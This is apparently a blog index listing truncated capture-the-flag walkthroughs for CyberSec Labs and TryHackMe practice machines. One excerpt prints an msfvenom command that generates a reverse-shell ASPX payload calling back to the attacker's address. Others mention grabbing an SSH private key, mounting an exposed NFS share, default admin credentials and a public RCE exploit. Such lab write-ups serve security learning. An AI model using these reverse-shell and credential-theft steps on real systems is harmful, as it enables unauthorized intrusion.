Secrets are meant to be secret

Day June 29, 2020

Weak

172.21.1.1 CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost=172.21.1.1 lport=443 -f aspx > shell.aspx http://172.31.1.11/shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS

172.31.1.8 Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares

172.31.1.7 CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs 172.31.1.7:/home/amir  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

Engine

172.31.1.16 CyberSec Labs Engine Walkthrough Port 80 open Gobuster finds a directory /blog It is blogengine cms which is not configured properly and has default creds admin:admin There’s an RCE exploit available for the same Python exploit.py –t 172.31.1.16/blog –l… Continue Reading →

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play  Tryhackme’s Attackingkerberos athttps://tryhackme.com/room/attackingkerberos[Task 1] Introduction This room will cover all of the basics of attacking Kerberos the windows ticket-granting service; we’ll cover the following:… Continue Reading →

© 2020 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑